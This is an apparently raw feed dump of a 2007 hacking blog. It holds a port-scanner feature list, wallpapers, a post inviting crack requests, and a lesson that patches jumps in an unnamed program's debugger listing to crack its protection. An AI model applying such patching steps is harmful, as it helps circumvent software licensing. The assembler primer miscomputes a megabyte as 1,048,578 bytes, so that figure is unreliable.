&lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Massive built-in port list description database &lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;IP and port scan order randomization&lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;A selection of useful tools (ping, traceroute, Whois etc) &lt;/td&gt;         &lt;/tr&gt;       &lt;/tbody&gt;&lt;/table&gt;     &lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td height="1"&gt;&lt;br /&gt;&lt;/td&gt;               &lt;/tr&gt;               &lt;tr&gt;                 &lt;td&gt;       &lt;table align="center" border="0" cellpadding="4" cellspacing="0" width="100%"&gt;         &lt;tbody&gt;&lt;tr&gt;        &lt;td align="right" bgcolor="#d7d7d7" valign="top" width="3%"&gt;&lt;img src="http://www.foundstone.com/images/bullet_4.gif" height="9" width="5" /&gt;&lt;/td&gt;              &lt;td bgcolor="#d7d7d7" width="97%"&gt;Extensive Windows host enumeration               capability&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-2416381096922731394?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/2416381096922731394/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=2416381096922731394' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2416381096922731394'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/2416381096922731394'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/super-scan-v-40_26.html' title='SUPER SCAN v 4.0'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-1620102060033881552</id><published>2007-04-24T15:26:00.000+05:30</published><updated>2007-05-29T12:29:08.463+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Lessons'/><title type='text'>HACKING LESSON 18</title><content type='html'>&lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;b style=""&gt;&lt;u&gt;&lt;span style="font-family: Arial;"&gt;Finalizing the patch-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;        &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;In order to finalize the patch and make an executable running file we need to perform the following steps – &lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;Repeat all the steps that we perform earlier but this time we have to change the instruction instead of flags.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;1). Keep on pressing F8 until you reach the following instruction “CMP EAX, -1” followed by “JNZ Short 0040109A”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Double click on “JNZ Short 0040109A”, a window will open. Remember, here we need to perform the jump in order to bypass the barrier so change JNZ to JMP, and click on assemble, rest remains the same.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;2). Keep on pressing F8 until you reach the following instruction “JNZ SHORT 004010B4” followed by “JMP SHORT 004010F7”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial; color: blue;"&gt;Double click on “JNZ Short 004010B4”, a window will open. Here also we need to perform the jump in order to bypass the barrier so change JNZ to JMP, and click on assemble, rest remains the same.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial;"&gt;3).Keep on pressing F8 until you reach the following instruction “JL SHORT 004010F7”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Double click on “JL Short 004010F7”, a window will open. Remember, here we &lt;b style=""&gt;do not need&lt;/b&gt; to jump because it will jump directly to the barrier so we need to skip this instruction. Change “JL Short 004010F7” to NOP, click on assemble, rest remains the same.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial;"&gt;4).Keep on pressing F8 until you again reach the following instruction “JL SHORT 004010F7”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Repeat step number 3.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="font-family: Arial;"&gt;Now all the four patches have been applied, next we need to save these patches and create an executable file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial; color: blue;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style="font-family: Arial;"&gt;1).Select the code from where you started applying patches i.e. from the opcode “00401073” to “004010D0”.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;2).Right click on the selection and select copy to executable &gt; selection.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;3).A new window will open, again right click inside the window and select save file. Make sure it is saved as an executable file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;4). Now click on the new file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;                &lt;p class="MsoNormal" style="text-align: justify;"&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;span style="font-weight: bold;"&gt;The file is cracked.&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Arial;"&gt;&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-1620102060033881552?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/1620102060033881552/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=1620102060033881552' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/1620102060033881552'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/1620102060033881552'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/hacking-lesson-18.html' title='HACKING LESSON 18'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6253672892889042746</id><published>2007-04-24T14:08:00.000+05:30</published><updated>2007-05-23T18:22:11.708+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Wallpapers'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ436dhyuI/AAAAAAAAAGo/YT4UfliSEyU/s1600-h/wallpaper.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ436dhyuI/AAAAAAAAAGo/YT4UfliSEyU/s200/wallpaper.jpg" alt="" id="BLOGGER_PHOTO_ID_5067738013935717090" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ4v6dhytI/AAAAAAAAAGg/rmEaqyw233o/s1600-h/ShowLetter.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ4v6dhytI/AAAAAAAAAGg/rmEaqyw233o/s200/ShowLetter.jpg" alt="" id="BLOGGER_PHOTO_ID_5067737876496763602" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6253672892889042746?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/6253672892889042746/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=6253672892889042746' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6253672892889042746'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6253672892889042746'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/blog-post_7634.html' title=''/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ436dhyuI/AAAAAAAAAGo/YT4UfliSEyU/s72-c/wallpaper.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5445264721555964631</id><published>2007-04-24T14:04:00.000+05:30</published><updated>2007-05-23T18:20:04.487+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Wallpapers'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RlQ4JadhysI/AAAAAAAAAGY/ZM4r9RHLCfA/s1600-h/davinci_1024.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_tGUVOS5hsyc/RlQ4JadhysI/AAAAAAAAAGY/ZM4r9RHLCfA/s200/davinci_1024.jpg" alt="" id="BLOGGER_PHOTO_ID_5067737215071800002" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_tGUVOS5hsyc/RlQ35qdhyrI/AAAAAAAAAGQ/6lbR7TEboUk/s1600-h/hacker.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://2.bp.blogspot.com/_tGUVOS5hsyc/RlQ35qdhyrI/AAAAAAAAAGQ/6lbR7TEboUk/s200/hacker.jpg" alt="" id="BLOGGER_PHOTO_ID_5067736944488860338" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-5445264721555964631?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/5445264721555964631/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=5445264721555964631' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5445264721555964631'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/5445264721555964631'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/blog-post_4066.html' title=''/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_tGUVOS5hsyc/RlQ4JadhysI/AAAAAAAAAGY/ZM4r9RHLCfA/s72-c/davinci_1024.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-7945823701214317605</id><published>2007-04-24T14:02:00.000+05:30</published><updated>2007-05-23T18:17:07.980+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Wallpapers'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ3u6dhyqI/AAAAAAAAAGI/6_D5BmIh1NY/s1600-h/Mac+Clowns.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ3u6dhyqI/AAAAAAAAAGI/6_D5BmIh1NY/s200/Mac+Clowns.jpg" alt="" id="BLOGGER_PHOTO_ID_5067736759805266594" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_tGUVOS5hsyc/RlQ2qKdhyoI/AAAAAAAAAF4/FlNcgvggn0w/s1600-h/leopardos.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_tGUVOS5hsyc/RlQ2qKdhyoI/AAAAAAAAAF4/FlNcgvggn0w/s200/leopardos.jpg" alt="" id="BLOGGER_PHOTO_ID_5067735578689260162" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-7945823701214317605?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/7945823701214317605/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=7945823701214317605' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7945823701214317605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/7945823701214317605'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/blog-post_9087.html' title=''/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQ3u6dhyqI/AAAAAAAAAGI/6_D5BmIh1NY/s72-c/Mac+Clowns.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-6440973017926820636</id><published>2007-04-24T14:00:00.000+05:30</published><updated>2007-05-23T18:15:55.097+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking Wallpapers'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQc26dhynI/AAAAAAAAAFw/-iBavk4NYis/s1600-h/I+Fade+Away.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQc26dhynI/AAAAAAAAAFw/-iBavk4NYis/s200/I+Fade+Away.jpg" alt="" id="BLOGGER_PHOTO_ID_5067707210430270066" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQcn6dhymI/AAAAAAAAAFo/bVCOl-rK4Uk/s1600-h/redxp.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQcn6dhymI/AAAAAAAAAFo/bVCOl-rK4Uk/s200/redxp.jpg" alt="" id="BLOGGER_PHOTO_ID_5067706952732232290" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_tGUVOS5hsyc/RlAgTadhyiI/AAAAAAAAAFI/-8cpuRHJXM4/s1600-h/davinci_1024.jpg"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-6440973017926820636?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6440973017926820636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/6440973017926820636'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/cool-wallpapers-for-ur-desktop.html' title=''/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_tGUVOS5hsyc/RlQc26dhynI/AAAAAAAAAFw/-iBavk4NYis/s72-c/I+Fade+Away.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-4542239663959518947</id><published>2007-04-23T18:14:00.000+05:30</published><updated>2007-05-20T15:49:43.864+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='S O L'/><title type='text'>S O L</title><content type='html'>&lt;span style="color: rgb(102, 102, 102); font-weight: bold;font-family:arial;font-size:130%;"  &gt;This is a new section of our blog where &lt;/span&gt;&lt;span style="color: rgb(102, 102, 102); font-weight: bold;font-family:arial;font-size:130%;"  &gt;&lt;span style="font-family:arial;"&gt;you can just post your query related to anything-----&lt;br /&gt;&lt;br /&gt;-Software&lt;br /&gt;-Crack&lt;br /&gt;-Hack, etc.&lt;br /&gt;&lt;br /&gt;in the comments field and we will try to answer it within the next 24 hrs.&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102);font-size:130%;" &gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="color: rgb(102, 102, 102); font-weight: bold;font-family:arial;font-size:130%;"  &gt;The format for Posting Query - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:arial;" &gt;Query -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-family:arial;" &gt;Your Email Id -&lt;/span&gt;&lt;span style="font-weight: bold;font-family:arial;" &gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4387334260922717220-4542239663959518947?l=hackingme.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingme.blogspot.com/feeds/4542239663959518947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4387334260922717220&amp;postID=4542239663959518947' title='56 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4542239663959518947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4387334260922717220/posts/default/4542239663959518947'/><link rel='alternate' type='text/html' href='http://hackingme.blogspot.com/2007/04/s-o-l.html' title='S O L'/><author><name>$</name><uri>http://www.blogger.com/profile/01699552287273677533</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>56</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4387334260922717220.post-5526325622263377943</id><published>2007-04-23T17:03:00.000+05:30</published><updated>2007-05-14T17:47:15.882+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Basics Of Assembler'/><title type='text'>Basics Of Assembler</title><content type='html'>&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;Pieces, bits and bytes:&lt;?xml:namespace prefix = o /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;BIT - &lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;The smallest possible piece of data. It can be either a 0 or a 1. If you put a bunch of bits together, you end up in the 'binary number system'&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;i.e. 00000001 = 1 00000010 = 2 00000011 = 3 etc. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;BYTE - &lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;A byte consists of 8 bits. It can have a maximal value of 255 (0-255). To make it easier to read binary numbers, we use the 'hexadecimal number system'. It's a 'base-16 system', while binary is a 'base-2 system' &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;/span&gt;&lt;b style="FONT-WEIGHT: bold"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;WORD&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;span style="FONT-WEIGHT: bold"&gt; &lt;/span&gt;- A word is just 2 bytes put together or 16 bits. A word can have a maximal value of 0FFFFh (or 65535d). &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;DOUBLE WORD -&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; A double word is 2 words together or 32 bits. Max value = 0FFFFFFFF (or 4294967295d). &lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;KILOBYTE - &lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;1000 bytes? No, a kilobyte does NOT equal 1000 bytes! Actually, there are 1024 (32*32) bytes. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;MEGABYTE - &lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;Again, not just 1 million bytes, but 1024*1024 or 1,048,578 bytes&lt;/span&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-ALIGN: justify"&gt;&lt;b&gt;&lt;u&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;REGISTERS:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/p&gt;&lt;p class="MsoPlainText" style="TEXT-INDENT: 35.4pt; TEXT-ALIGN: justify"&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;o:p&gt;&lt;/o:p&gt;Registers are “special places” in your computer's memory where we can store data. You can see a register as a little box, wherein we can store something: a name, a number, a sentence. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;br /&gt;EAX:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Accumulator Register&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt;&lt;br /&gt;EBX:&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB"  style="font-family:Arial;"&gt; Extended Base Register&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span lang="EN-GB"  